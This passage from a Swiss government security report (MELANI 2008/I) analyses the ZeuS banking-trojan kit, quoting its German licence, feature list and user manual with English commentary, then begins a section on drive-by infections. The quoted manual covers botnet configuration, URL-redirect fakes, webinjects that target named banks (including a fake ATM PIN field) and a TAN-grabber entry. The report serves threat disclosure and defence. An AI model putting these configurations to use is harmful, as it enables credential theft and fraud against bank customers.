            1. Ist nicht berechtigt, ZeuS zu irgendwelchen kommerziellen oder nicht-kommerziellen Zwecken zu
               verbreiten, die nicht den Interessen des Verkäufers entsprechen.
            2. ist nicht berechtigt, den binären Code des Bots und des Builders zu disassemblieren/analysieren.
            3. Ist nicht berechtigt, das Steuerungspanel zur Verwaltung anderer Botnets oder zu irgendwelchen
               anderen Zwecken zu verwenden, die in keinem Zusammenhang mit ZeuS stehen.
            4. Ist nicht berechtigt, absichtlich irgendwelche Teile von ZeuS an Antiviren-Software-Hersteller oder
               andere, ähnliche Einrichtungen zu senden.
            5. Verpflichtet sich, den Verkäufer für jede Erneuerung von ZeuS zu bezahlen, die nicht mit Fehlern in
               dessen Funktionsweise in Zusammenhang steht, ebenso für die Ergänzung um jede zusätzliche
               Funktionalität.




35
   See also MELANI semi-annual report 2006/2:
http://www.melani.admin.ch/dokumentation/00123/00124/01019/index.html?lang=en (as of: 21 July 2008),
and the following Symantec Internet Security Threat Report:
http://eval.symantec.com/mktginfo/enterprise/white_papers/ent-
whitepaper_internet_security_threat_report_xii_exec_summary_09_2007.en-us.pdf, (as of: 21 July 2008).
                                                                                                                     32/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

Wird gegen diese Vereinbarung verstossen und dieser Verstoss entdeckt, gehen Sie jedweder technischen
Unterstützung verlustig. Darüber hinaus wird der Bot Ihrer Zusammenstellung unverzüglich den Antiviren-
Software-Herstellern zugesandt.

The contract imitates licence conditions of commercial software, although this programme is
intended for sale on the black market. How can one prevent the software from being shared,
especially in an environment where the normal rules do not apply? The developers have
chosen the path of sanctions. A violation of the agreement has consequences: denial of
technical support or reporting of the bot to anti-virus software manufacturers. The fact that
the software ultimately ended up freely downloadable on the Internet shows that these
measures did not have the desired deterrent effect, however.

Product description:

ZeuS ist eine Spionage-Software (Spyware, im weiteren «Bot») für 32bit MS Windows 2000/XP + dient zur
Steuerung der Rechner von Opfern und zum Erhalt von Information von diesen mit Hilfe von Logs.

ZeuS besteht aus drei Teilen:

         1. einem Steuerungspanel, das auf dem/den Server(n) installiert wird,
         2. dem Builder, einer Anwendung für Windows, die zur Konfiguration des Bots dient,
         3. dem Bot, einer Anwendung für Windows, die aber bereits auf dem Rechner des Opfers ausgeführt wird.

ZeuS verfügt über folgende grundlegenden Möglichkeiten und Eigenschaften (hier wird die komplette Liste
angeführt, in Ihrer Zusammenstellung kann ein Teil dieser Liste fehlen):

   1. Der Bot:
          1. In VC++ 8.0 geschrieben, ohne Verwendung von RTL usw., in reiner WinAPI, wodurch ein geringer
               Umfang erreicht wird (10-25 Kb, je nach Paketzusammenstellung).
          2. Verfügt über keinen eigenen Prozess, wodurch er in der Liste der Prozesse nicht entdeckt werden
               kann.
          3. Umgeht die Mehrzahl der Firewalls (einschliesslich der populären Outpost Firewall der Versionen 3,
               4, es besteht aber ein temporäres kleines Problem mit Anti-Spyware-Programmen). Die
               ungehinderte Annahme eingehender Verbindungen kann nicht garantiert werden.
          4. Ist durch Suche/Analyse schwer aufzuspüren, der Bot installiert sich beim Opfer und erstellt eine
               Datei mit der Zeit [wohl: Erstellungs-/Änderungsdatum – Anm. d. Ü.] von Systemdateien und einer
               willkürlichen Dateigrösse.
          5. Funktioniert unter eingeschränkten Windows-Benutzerkonten (der Einsatz unter Gast-
               Benutzerkonten wird derzeit nicht unterstützt).
          6. Unsichtbar für die Heuristik von Antiviren-Software, der Rumpfteil [body] des Bots ist verschlüsselt.
          7. Ruft in keinster Weise einen Verdacht auf seine Anwesenheit hervor, wenn Sie dies nicht möchten.
               Gemeint sind hiermit Dinge, die viele Spyware-Autoren lieben: die Auslagerung von Firewalls und
               Antiviren-Software, die Verhinderung von Updates dieser Programme, die Sperrung von
               Ctrl+Alt+Del usw.
          8. Blockierung der Windows-Firewall (diese Funktion ist nur für die ungehinderte Annahme
               eingehender Verbindungen erforderlich).



The bot exhibits similarities with many equivalent software programmes, such as the
possibility of deactivating firewalls and anti-virus programmes, preventing updates, blocking
task managers, and much more.

             9.  Der Bot speichert/empfängt/sendet alle seine Einstellungen/Logs/Anweisungen in verschlüsselter
                 Form via HTTP(S)-Protokoll. (d.h. nur Sie werden die Daten im Textformat sehen, alles übrige Bot
                 <-> Server wird wie Müll aussehen)(.
             10. NAT-Detection mittels Prüfung der eigenen IP über eine von Ihnen angegebene Webseite.
             11. Gesonderte Konfigurationsdatei; schützt vor dem Verlust des Botnets, falls der Hauptserver nicht
                 verfügbar ist. Darüber hinaus zusätzliche (Reserve-) Konfigurationsdateien, auf die der Bot zugreift,
                 falls die Haupt-Konfigurationsdatei nicht verfügbar ist. Dieses System garantiert das Überleben
                 Ihres Botnets in 90% aller Fälle.


                                                                                                                         33/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

Interesting is also the defense system, which, in the event of failure of the central command
server (C&C), is intended to ensure a switch to a backup server for the further functioning of
the botnet, which may become necessary in the event of police intervention, for instance. An
alternative URL can be used for the configuration file for this purpose. The programmers
assure that this guarantees sufficient robustness of the network.

             12. Es kann mit beliebigen Browsern/Programmen gearbeitet werden, die via wininet.dll arbeiten
                 (Internet Explorer, AOL, Maxton etc.):
                 1. Abfangen von POST-Daten + Abfangen von Tastatureingaben (einschliesslich Daten, die aus
                      der Zwischenablage eingefügt werden).
                 2. Transparente URL-Umleitung (auf Fake-Websites etc.) mit Angabe einfachster Redirect-
                      Bedingungen (zum Beispiel: nur bei GET- oder POST-Abfrage, bei Vorliegen oder Fehlen
                      bestimmter Daten in der POST-Abfrage).
                 3. Transparente HTTP(S)-Substitution des Inhalts (Webinject, welches das Austauschen nicht nur
                      einer HTML-Seite, sondern auch jedes beliebigen anderen Datentyps ermöglicht). Der
                      Austausch wird mit Hilfe der Angabe von Austauschmasken vorgenommen.
                 4. Erhalt des Inhalts einer benötigten Seite mit Ausschluss von HTML-Tags. Basiert auf
                      Webinject.
                 5. Anpassbarer TAN-Grabber für beliebige Länder.
                 6. Erhalt einer Liste von Fragen und Antworten der "Bank Of America" nach erfolgreicher
                      Autorisierung.
                 7. Löschung gewünschter POST-Daten auf gewünschten URL.
                 8. IDEALE LÖSUNG FÜR VIRTUELLE TASTATUREN: Nachdem Sie auf die gewünschte URL
                      gegangen sind, erfolgt ein Screenshot in dem Bereich des Bildschirms, in dem die linke
                      Maustaste gedrückt wurde. Erhalt von Zertifikaten aus dem «MY»-Speicher (Zertifikate mit dem
                      Vermerk «nicht exportierbar» werden nicht korrekt exportiert) und dessen Leerung. Danach
                      wird jedes beliebige importierte Zertifikat auf dem Server gespeichert.
             13. Abfangen von Logins/Passwörtern der Protokolle POP3 und FTP (unabhängig vom Port) und
                 Aufzeichnung derselben im Log nur bei erfolgreicher Autorisierung.
             14. Änderung des lokalen DNS, Löschung/Ergänzung der Aufzeichnungen in der Datei %system32 %,
                 d.h. Vergleich der angegebenen Domain mit der angegeben IP für WinSocket.
             15. Speichert den Inhalt des „Protected Storage“ beim ersten Starten auf dem Rechner.
             16. Löscht Cookies aus dem Cache des Internet Explorers beim ersten Starten auf dem Rechner.
             17. Suche per Suchmaske von Dateien auf logischen Laufwerken oder Download einer konkreten
                 Datei.
             18. Aufzeichnung kürzlich besuchter Seiten beim ersten Starten auf dem Rechner. Nützlich bei
                 Installation durch Sploits – wenn Sie den Download bei einem zweifelhaften Service erwerben,
                 können Sie so erfahren, was parallel noch geladen wird.
             19. Real-time-Screenshot vom Rechner des Opfers, der Rechner muss sich ausserhalb der NAT
                 befinden.
             20. Empfang serverseitiger Befehle und Rücksendung von Berichten über deren erfolgreiche
                 Ausführung. (Derzeit: Starten lokaler/entfernter Dateien, sofortige Aktualisierung der
                 Konfigurationsdatei, Zerstörung des Betriebssystems).
             21. Socks4-Server.
             22. HTTP (S) PROXY-Server.
             23. Upgrade des Bots auf die neueste Version (die URL der neuen Version schreibt sich in die
                 Konfigurationsdatei ein).

   2. The control panel:

This chapter introduces the user interface of the control panel: It is similar to the interface of
any software sold on the commercial market and uses PHP and MySQL as a database. This
facilitates its use by many different individuals with different privileges and needs.

            1.    Setzt PHP + MySQL voraus.
            2.    Einfache Installation (gewöhnlich genügt die Eingabe der MySQL-Userdaten und das Anklicken des
                  Buttons «Install»).
            3.    Mehrbenutzerverwaltung, jedem Benutzer können bestimmte Zugangsrechte erteilt werden.
            4.    Statistik der Installationen (Infizierungen).
            5.    Statistik der online befindlichen Bots.
            6.    Aufteilung des Botnets in Subbotnets.
            7.    Übersicht über die online befindlichen Bots (auch Filter möglich)
                  1. Screenshot-Sichtung in Echtzeit.
                  2. Sichtung und Überprüfung von Sock4.
                  3. Online-Dauer des Bots.
                  4. Verbindungsgeschwindigkeit (nur für Bots ausserhalb der NAT).
            8.    Datenbank-Speicherung von Logs. Dies hat folgende Vorteile:
                                                                                                                     34/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

                  1.Suche nach Logs per Inhalts-Filter.
                  2.Suche nach Logs per Vorgaben, in denen die gewünschten POST-Angaben hervorgehoben
                     sind (ermöglicht zum Beispiel auf der Webseite http://rambler.ru/ nur Logs und Kennwort
                     herauszuholen, wobei bei der Suche alle übrigen Daten weggelassen werden).
            9. Speicherung von Logs in verschlüsselten Dateien, in der Struktur von Verzeichnissen:
                Botnet\Land\ID des Computers.
            10. Erteilung von Befehlen an die Bots (auch Filter möglich).
            11. Wenn Sie über PHP-Kenntnisse verfügen, können Sie das Steuerungs-Panel selbst nach Ihrem
                Geschmack umgestalten.

   3. The builder:

Point 5 is especially interesting, in which the developers refer to a polymorphic encryption,
which generates a new version of the Trojan horse each time and thus makes the bot difficult
for anti-virus programmes to recognize.

            1.    In VC++ 8.0 geschrieben, ohne Verwendung von RTL usw., in reiner WinAPI, wodurch ein kleiner
                  Umfang erreicht wird (hängt von der Zusammenstellung ab, bei Zusammenstellung mit Log-Decoder
                  beträgt der Umfang mehr als 400 kb, da eine Länderdatenbank nach IP-Nummern eingeschlossen
                  wird).
            2.    Status-Übersicht des laufenden Systems; um den Bot zu testen, können Sie ihn auf Ihrem eigenen
                  Computer starten und ihn dann per Tastendruck löschen.
            3.    Log-Decoder, mit Gliederung nach Ländern.
            4.    Builder für die Konfigurationsdatei (verschlüsselt) und den Bot selbst.
            5.    Polymorphe Verschlüsselung – BETA. Befindet sich derzeit im Test-Stadium und garantiert keinen
                  hundertprozentigen Schutz gegen Antiviren-Software. Die Fertigstellung dieser Funktion in nächster
                  Zeit wird jedoch gewährleistet.



Installation of the bot

The following chapter describes the installation of the control panel on a server. As the
explanations below show, common PHP-based content management systems such as
Wordpress, Typo3, and Textpattern are used as models. It suffices to set appropriate write
privileges in the directories (chmod 777) and start the installation via index.php. A series of
parameterizations follows, such as password, server addresses, and so on.

   1.    Der Server sollte mindestens folgende Software vorinstalliert haben: Apache, beliebige Version, PHP ab
         Version 4 oder höher, MySQL ab Version 4 oder höher. Gewöhnlich sind diese Programme bereits auf
         dem Server installiert, andernfalls wenden Sie sich an den Supportservice des Servers.
   2.    Kopieren Sie den Inhalt des Ordners 'web' aus Ihrem Softwarepaket in ein beliebiges (optimalerweise
         neues) Verzeichnis Ihrer Wahl auf den Server, auf das Sie Zugriff via HTTP-Protokoll haben.
   3.    Falls der Server auf einem *nix - System (Linux, FreeBSD etc.) läuft, setzen Sie auf dem Verzeichnis
         'system' die Rechte 0777 (chmod).
   4.    Rufen Sie via HTTP das Script 'install/index.php' auf (z.B. http://bot.net/zeus/.install/index.php); daraufhin
         sollte das Installationsscript starten. Falls dies nicht geschieht, ist möglicherweise der Server nicht korrekt
         eingerichtet.
   5.    Machen Sie alle vom Script abgefragten Angaben.
           1. Root login: Login und Passwort für den erstellten Administrator des Steuerungspanels.
           2. MySQL server: Angaben für die MySQL-Nutzung. Der angegebene User muss bereits existieren,
                 die angegebene DB wird aber automatisch erstellt, falls sie nicht existiert; die Rechte zur
                 Datenbank-Erstellung müssen gegeben sein).
           3. MySQL tables: Tabellen-Namen in der MySQL-DB. Sollten im Falle von Maskierung geändert
                 werden.
           4. Local paths: Lokale Harddisk-Pfade relativ zum Installationsverzeichnis.
           5. Options: Zusätzliche Optionen (können nach der Installation im Steuerungspanel geändert
                 werden).
                        Enable log write to database: Logs von infizierten Computern in die DB schreiben? Diese
                        Methode ermöglicht es, Suchabfragen direkt über das Steuerungspanel durchzuführen, sie
                        erfordert allerdings mehr Serverressourcen.
                   1. Enable log write to local path: Logs von infizierten Computern in Dateien schreiben? Die
                        Dateien werden verschlüsselt und können erst nach ihrer Entschlüsselung durch den Builder
                        eingesehen werden.


                                                                                                                           35/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

                     2.  Online bot timeout: Timeout der online befindlichen Bots, sollte je nach Server 0-5 Minuten
                         mehr als der Wert TIMER_STATS in der Bot-Konfiguration betragen. Empfohlener Wert:
                         TIMER_STATS plus 5 Minuten.
            6.    Klicken Sie auf den Button 'Install'; die Installation kann bis zu einer Minute dauern (die Länder-
                  Datenbank nach IP-Nummern wird gefüllt).
            7.    Falls die Installation erfolgreich war, können Sie das Verzeichnis '.install' löschen, und direkt ins
                  Steuerungspanel gehen. Falls bei der Installation Fehler auftreten, prüfen Sie die Richtigkeit der
                  Dateneingabe, evtl. sollten die Einstellungen von PHP und MySQL überprüft werden, darüber
                  hinaus können Sie sich an den technischen Support von ZeuS wenden.



Configuration:

The developers split configuration into a static and a dynamic part. The static part contains
parameters such as a timer and the URL for renewing the configuration file. The dynamic
part contains parameters to secure the robustness of the network and to allow fast switches
of attack targets. This includes the URLs from where updated versions can be downloaded
and installed, if desired also in different locations (backup). If one of the addresses is
discovered and shut down by the police, the bot uses an alternative address and downloads
an updated version. This part also contains the URL where the stolen data is saved
(dropbox) and the alternative URLs from where the configuration file can be downloaded.
Finally, it also contains the file with the webinjects (see below).

Die Datei besteht aus den beiden Abschnitten StaticConfig und DynamicConfig.

StaticConfig: Die Werte dieses Abschnitts werden direkt in die Bot-Datei, d.h. die exe-Datei geschrieben, sie
definieren das grundsätzliche Verhalten des Bots auf dem Rechner des Opfers.
Je nach Ihrer Paketzusammenstellung können einige der Parameter für Sie ohne Bedeutung sein; alle
bedeutsamen Parameter sind in dem Beispiel, das dem Softwarepaket beiliegt, ausgeführt.

      •     botnet [Zeile] – legt die Bezeichnung des Botnets fest, zu dem der Bot gehört.
            Zeile – Bezeichnung des Botnets, bis zu 4 Zeichen oder 0 für den Defaultwert.

            Empfohlener Wert: botnet 0

      •     timer_config [Wert1] [Wert2] – bestimmt die Zeitspanne, innerhalb deren die Erneuerung der
            Konfigurationsdatei empfangen werden soll.
            Wert1 – bestimmt die Zeit in Minuten, innerhalb deren die Konfigurationsdatei erneuert werden soll, falls
            sie beim letzten Mal erfolgreich geladen wurde.
            Wert2 – bestimmt die Zeit in Minuten, innerhalb deren die Konfigurationsdatei erneuert werden soll, falls
            es beim letzten Laden zu Fehlern gekommen ist.

            Empfohlener Wert: timer_config 60 5

      •     timer_logs [Wert1] [Wert2] – bestimmt die Zeitspanne, innerhalb deren die angesammelten Logs an
            den Server gesendet werden sollen.
            Wert1 – bestimmt die Zeit in Minuten, innerhalb deren die Logs gesendet werden sollen, falls die letzte
            Übertragung erfolgreich war.
            Wert2 – bestimmt die Zeit in Minuten, innerhalb deren die Logs gesendet werden sollen, falls es bei der
            letzten Übertragung zu Fehlern gekommen ist.

            Empfohlener Wert: timer_logs 2 2

      •     timer_stats [Wert1] [Wert2] – bestimmt die Zeitspanne, innerhalb deren die die Statistik an den Server
            gesendet werden soll. (hierzu zählen die Installationen, die online befindlichen Bots, offene Ports der
            Socks-Services, Screenshots usw.)
            Wert1 – bestimmt die Zeit in Minuten, innerhalb deren die Statistik gesendet werden soll, falls die letzte
            Übertragung erfolgreich war.
            Wert2 – bestimmt die Zeit in Minuten innerhalb deren die Statistik gesendet werden soll, falls es bei der
            letzten Übertragung zu Fehlern gekommen ist.

            Empfohlener Wert: timer_logs 20 10



                                                                                                                          36/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

      •     url_config [url] – URL der Haupt-Konfigurationsdatei; dies ist der wichtigste Parameter; wenn die
            Konfigurationsdatei bei der Infektion des Opfer-Rechners unter der angegebenen URL nicht verfügbar
            ist, ist die Infektion sinnlos.

      •     url_compip [url] [Wert] – legt die Webseite zur Überprüfung der eigenen IP fest, dient zur Definition der
            NAT.
              url – bestimmt die URL der Webseite
              Wert – Bestimmt die Anzahl Byte, die downzuloaden ausreicht, um am Download seine IP zu
            erkennen.

      •     blacklist_languages [Wert1] [Wert2]...[WertX] – legt die Liste von Windows-Sprachcodes fest, für die
            sich der Bot immer im Sleep-Modus befinden soll, d.h. er wird keine Logs und keine Statistik versenden,
            aber die Konfigurationsdatei kontaktieren.
               WertX – Sprachcode, zum Beispiel für RU: 1049, EN: 1033.

DynamicConfig, the values in this section are written into the final configuration file. Depending on your package
composition, some of the parameters may be without significance to you; all important parameters are explained
in the example included with the software package.

      •     url_loader [url] – legt die URL fest, unter der man ein Upgrade des Bots downloaden kann. Dieser
            Parameter ist nur dann aktuell, wenn Sie eine neue Bot-Versions ins Botnet geschickt haben und seine
            Konfiguration über dieselbe URL überschrieben haben wie die alte Konfiguration; in diesem Fall
            beginnen die alten Bot-Versionen, sich über die in diesem Eintrag angegebene Datei zu erneuern.

      •     url_server [url] – legt die URL fest, über die Statistik, Dateien, Logs usw. von den Rechnern der Opfer
            versendet werden.

      •     file_webinjects – legt die lokale Datei mit der Liste der Webinjects fest. Eine Beschreibung des Formats
            dieser Datei finden Sie hier.

Unterabschnitt AdvancedConfigs – Enthält die Liste der URLs, unter denen eine Reserve-Konfigurationsdatei
downgeloadet werden kann, falls die Hauptdatei nicht verfügbar ist. Es ist empfehlenswert, in diesen
Unterabschnitt 1-3 URLs einzutragen; dadurch kann das Botnet vor dem Untergang bewahrt werden, wenn die
Hauptdatei nicht verfügbar ist, und danach in aller Ruhe auf einen anderen Server übertragen werden. Unter den
angegebenen URLs brauchen nicht notwendigerweise Dateien vorhanden zu sein, es geht vielmehr darum, dass
man später unter diesen URLs Dateien ablegen kann. Die Dateien müssen erst abgelegt werden, nachdem die
Nichtverfügbarkeit der Haupt-Konfiguratios-Datei festgestellt wurde. Falls Sie unter diesen URLs immer Dateien
bereithalten möchten, müssen Sie sie immer gleichzeitig mit der Haupt-Konfigurationsdatei erneuern. Die
Reservedateien unterscheiden sich durch nichts von der Hauptdatei und werden auf dieselbe Weise erstellt wie
diese.



URL redirects:

Using concrete examples for purposes of simplification, this chapter describes the
functioning of the URL redirects.

Die Auflistung der URL-Redirects (im weiteren: «Fakes») wird im Unterabschnitt WebFakes des Abschnitts
DynamicConfig aufgeführt.

Format des Eintrags: [ursprüngliche URL] [neue URL] [Schalter] [Blackmask POST] [Whitemask POST]
[Blockierungs-URL]

      •     ursprüngliche URL – URL, die geändert werden soll; es kann eine Mask verwendet werden.

      •     neue URL – = Fake: die URL, die anstelle der ursprünglichen URL aufgerufen werden soll.

      •     Schalter – bestimmt die Hauptbedingung des Aufrufs; kann aus mehreren Schaltern in beliebiger
            Reihenfolge bestehen, allerdings wird die Gross-/Kleinschreibung berücksichtigt [case-sensitive]. Derzeit
            sind folgende Schalter verfügbar:
                 o P – neue URL laden bei POST-Anfrage der ursprünglichen URL.
                 o G – neue URL laden bei GET-Anfrage der ursprünglichen URL.
                                                                                                                        37/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

                  o     S – neue URL laden unter Beibehaltung des Pfades.

                        Dieser Schalter erlaubt die freie Verwendung von "Scamsites" als gewöhnliche "Fake-Sites";
                        ausführlicher siehe weiter unten.

      •     Blackmask POST – Mask derjenigen an die neue URL übergebenen POST-Daten, bei deren Vorliegen
            nicht die Fakesite geladen wird. Gewöhnlich werden hier Felder angegeben, die sich in der Fakesite
            befinden; dadurch kann verhindert werden, dass die Fakesite in einer Endlosschleife auf sich selbst
            verweist. Wenn keine Notwendigkeit vorliegt, dieses Feld auszufüllen, kann es leer gelassen werden
            oder mit dem Zeichen * ausgefüllt werden.

      •     Whitemask POST - Mask derjenigen an die neue URL übergeben POST-Daten, bei deren Vorliegen die
            Fakesite geladen wird. D.h., wenn die POST-Daten nicht mit dieser Maske übereinstimmen, so wird die
            Fakesite nicht geladen. Dieses Feld wird in der Praxis ziemlich selten verwendet; lassen Sie es leer oder
            füllen Sie es mit dem Zeichen * aus, damit es ignoriert wird.

      •     Blockierungs-URL – falls Ihr URL-Redirect nur ein Mal auf dem Rechner des Opfers geladen werden
            soll, muss hier eine URL-Mask angegeben werden, bei deren Aufruf das betreffende URL-Redirect auf
            dem Rechner nicht mehr verwendet wird. Falls Sie es nicht benötigen, lasen Sie dieses Feld leer.

Lade-Algorithmus des URL-Redirects:

      1.    Suche der vom Opfer geladenen URL in der Konfigurationsdatei.
      2.    Prüfung der Schalter.
      3.    Überprüfung auf Übereinstimmungen mit der Blackmask.
      4.    Überprüfung auf Übereinstimmungen mit der Whitemask.
      5.    Aufruf der neuen URL.

Verwendung des Schalters «S»:

Dieser Schalter wird meist für die Übergabe der Steuerung an die «Scamsite» verwendet. Durch das Setzen des
Schalters muss die neue URL die Grund-URL für die «Scamsite» sein; der Bot fügt am Ende der neuen URL
einen Teil des Pfads aus der realen URL an, beginnend nach dem Letzten Slash (Zeichen: “\","/") der
übereinstimmenden ursprünglichen URL.

Beispiele:

entry webfakes

      •     http://*.rambler.ru* http://yandex.ru GP * *
            Welche Seite das Opfer auf rambler.ru auch zu öffnen versucht, es wird immer die Hauptseite von
            yandex.ru geladen.

      •     http://mail.rambler.ru/script/auth.cgi http://mydomain/myrambler.asp P "*&mailtan=*" *
            Beispiel eines "Übergangs"-Fakes, der das Feld „mailtan“ beinhaltet. Die Fakesite wird geladen bei
            POST-Anfragen, in denen „mailtan“ nicht vorkomt, deshalb wird nach der Verarbeitung des Fakes das
            Opfer normal auf seine E-mails gelangen.

      •     http://mail.rambler.ru/script/auth.cgi http://mydomain/myrambler.asp P "*&mailtan=*" "*login=*"
            Beispiel eines "Übergangs"-Fakes, der das Feld „mailtan“ beinhaltet. Die Fakesite wird geladen bei
            POST-Anfragen, in denen „mailtan“ nicht vorkommt, in denen aber "login" vorkommt.

end




Webinjects:

This is followed by a formatting description for the use of the webinjects. Webinjects are
parts of the HTML code inserted into the original Internet pages or replacing parts thereof.
“Data_before” is used to define the line of code preceding the modification, and “data_after”
to define the end of the modification.

                                                                                                                        38/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

Zwecks bequemeren Schreibens werden Webinjects in eine eigene Datei geschrieben, die in der
Konfigurationsdatei als DynamicConfig.file_webinjects angegeben wird. Selbstverständlich werden nach der
Erstellung der endgültigen Konfigurationsdatei keinerlei zusätzlichen Dateien mehr generiert.

Die Datei besteht aus einer Auflistung von URLs, für die eine unbegrenzte Anzahl Webinjects angegeben werden
kann; die zu ändernde URL wird in einer Zeile nach den Regeln Konfigurationsdatei angegeben: set_url [URL]
[Schalter] [Blackmask POST] [Whitemask POST], wobei die beiden letzten Parameter fakultativ sind.



      •     URL – die URL auf die das Webinjekt angesetzt werden soll; der Einsatz einer Mask ist möglich.

      •     Schalter– bestimmt die Hauptbedingung des Aufrufs; kann aus mehreren Schalter in beliebiger
            Reihenfolge bestehen, allerdings wird die Gross-/Kleinschreibung berücksichtigt [case-sensitive]. Derzeit
            sind folgende Schalter verfügbar:
                 o P – Webinject ausführen bei POST-Anfrage der URL.
                 o G – Webinject ausführen bei POST-Anfrage der URL [sic; Anm. d. Ü.].
                 o L – ändert den Zweck des Webinject; wenn dieser Schalter gesetzt wird, wird der gewünschte
                     Daten-Ausschnitt erhalten und unverzüglich im Log gespeichert.

      •     Blackmask POST – Mask derjenigen an die URL übergebenen POST-Daten, bei deren Vorliegen das
            Webinject nicht ausgeführt wird

      •     Whitemask POST – Mask derjenigen an die URL übergebenen POST-Daten, bei deren Vorliegen das
            Webinject ausgeführt wird.

Nach der Angabe der URL folgt aber der nächsten Zeile eine Auflistung der Webinjects, die bis zum Dateiende
reicht oder bis zur Angabe einer neuen URL mittels eines weiteren Eintrags vom Typ set_url. Einen Webinject
besteht aus drei Elementen:

      •     Ohne Schalter L:
               o data_before – Mask der Daten, nach denen neue Daten aufgezeichnet werden sollen.
               o data_after – Mask der Daten, vor denen neue Daten aufgezeichnet werden sollen.
               o data_inject – neue Daten, die das zwischen data_before und data_after Enthaltene ersetzen
                   werden.

      •     Mit Schalter L:
                 o data_before – Mask der Daten, nach denen der Ausschnitt der zu erhaltenden Daten beginnt.
                 o data_after – Mask der Daten, vor denen der Ausschnitt der zu erhaltenden Daten endet.
                 o data_inject – hat die Funktion des Kopfteils für die zu erhaltenden Daten, dient lediglich zur
                    visuellen Hervorhebung in den Logs.

Beispiele:

                  o     set_url https://www.e-gold.com/acct/balance.asp* GPL
                  o     data_before
                  o     <form name=fiat*</form>
                  o     data_end
                  o     data_inject
                  o     data_end
                  o     data_after
                  o     <th colspan=4 align=left valign="bottom"
                  o     data_end
                  o
                  o     set_url https://online.wellsfargo.com/das/cgi-bin/session.cgi* GL
                  o     data_before
                  o     <div id="pageIntro" class="noprint">
                  o     data_end
                  o     data_inject
                  o     data_end
                  o     data_after
                  o     <td id="sidebar" align="left" valign="top" class="noprint">
                  o     data_end
                  o
                  o     set_url https://www.wellsfargo.com/* G
                  o     data_before
                                                                                                                        39/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

                  o     <span class="mozcloak"><input type="password"*</span>
                  o     data_end
                  o     data_inject
                  o     <br><strong><label for="atmpin">ATM PIN</label>:</strong>&nbsp;<br />
                  o     <span class="mozcloak"><input type="password" accesskey="A" id="atmpin" name="USpass"
                        size="13" maxlength="14" style="width:147px" tabindex="2" /></span>
                  o     data_end
                  o     data_after
                  o     data_end



TAN grabber:

The last chapter of the user manual is dedicated to the function of the TAN grabber
(Transaction Authentication Number). The example refers to an online banking address.

Auflistung der Einstellungen des TAN-Grabbers; wird im Unterabschnitt TanGrabber des Abschnitts
DynamicConfig gespeichert.

        •     Format des Eintrags: [URL-Mask] [Schalter] [Whitemask POST] [Blackmask POST] [Bezeichnung des
              Werts]

        •     URL-Mask – URL, beim Übergang auf welche die TAN in den POST-Daten gesucht werden soll.

        •     Schalter – bestimmt die Hauptbedingung des Erhalts der TAN, kann aus mehreren Schaltern in
              beliebiger Reihenfolge bestehen, allerdings wird die Gross-/Kleinschreibung berücksichtigt [case-
              sensitive]. Alle gemeinsam erlauben eine eine genauere Bestimmung der TAN. Derzeit sind folgende
              Schalter verfügbar:
                   o Sxx – legt fest, nach welcher Anzahl ausgelassener TANs die TAN ausgetauscht werden muss.
                       xx – Zahl
                   o zwischen 1 und 99, die diese Anzahl angibt.
                   o Rxx – legt fest, dass die Bezeichnung der TAN in den POST-Daten variabel ist, und ermöglicht
                       es, das Auffinden der TAN nach der Position zu bestimmen. xx – Zahl zwischen 1 und 99, die
                       diese Position angibt.
                   o Cxx – legt die Anzahl der Ziffern in der TAN fest.. xx – Zahl zwischen 1 und 9.

        •     Whitemask POST – Mask derjenigen an die URL übergebenen POST-Daten, bei deren Vorliegen der
              TAN-Grabber ausgeführt wird.

        •     Blackmask POST – Mask derjenigen an die URL übergebenen POST-Daten, bei deren Vorliegen der
              TAN-Grabber ausgeführt wird.

        •     Bezeichnung des Wertes – Wenn Sie die Schalter R oder C nicht gesetzt haben, so muss hier
              unbedingt die Bezeichnung derjenigen Variablen in den POST-Daten angegeben werden, welche die
              TAN erhält; es kann eine Mask verwendet werden.

Funktions-Algorithmus des TAN-Grabbers:

   1.       Suche der URL in der Konfigurationsdatei.
   2.       Prüfung der POST-Daten.
   3.       Prüfung des Wertes des Schalters S.
   4.       Suche der Variable mit der TAN.
   5.       Speicherung der TAN.
   6.       Ersetzung der TAN den in POST-Daten und Fortsetzung der Ausführung der Abfrage.

Beispiele:

entry tangrabber

        •     https://banking.*sparkasse*.de/cgi/login.cgi S3 * tan

end


                                                                                                                    40/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

The description of various aspects of the installation and use of ZeuS makes clear that this
software can also be used by persons without special expertise. Anyone who has ever used
a PHP or MySQL application will recognize extensive similarities. This corresponds to the
professionalization concept of the actors: one group develops the software and offers it for
purchase on the black market. Another group generates malware and uses the software to
distribute it and build up a botnet – for instance via spam e-mails. This botnet is then rented
by a third group to attack e-banking systems and recruit money mules. All three actors have
one thing in common: they are engaged in a criminal activity to enrich themselves financially.




10.2 Drive-by Infections: What They Are and How They
    Work
MELANI has reported drive-by infections in the semi-annual reports of 2007/1 and 2007/2
and also covered the topic of prevention from the perspectives of the users and the website
administrators. Over the last year, the threat from drive-by infections has further increased.
This appendix offers a detailed explanation of how an infection occurs using an anonymized
Swiss example.

Definition

Drive-by infections are a means of spreading malware that attacks the users simply through
their surfing habits. The user may not even notice this is happening. As a rule, the goal of the
malware authors is to get access to end-users computers. The term “drive-by” infection is an
Americanism that refers to the convenience of consuming by car (hence “drive-by” shopping,
“drive-by” fast-food restaurants, or “drive-by” cinemas) using this as a metaphor for surfing
the Internet. Drive-by attacks usually involve the malware authors abusing third-party
websites by planting additional malicious elements into the website code.

The infection

There are several possibilities for infecting websites with malicious code. Applications based
on PHP often contain vulnerable components allowing attackers to access the operating or
file system. The webserver itself may also contain such vulnerabilities. Exploiting these
vulnerabilities allows attackers to manipulate web contents and inject additional code.
Another option for changing web contents is the misuse of FTP login data used for the
administration of websites. The computer from which the website is administered is then
infected with a Trojan, which in turn steals the access data. The attacker uses the stolen
passwords to log in and to supplement the website code with malicious functions. Such
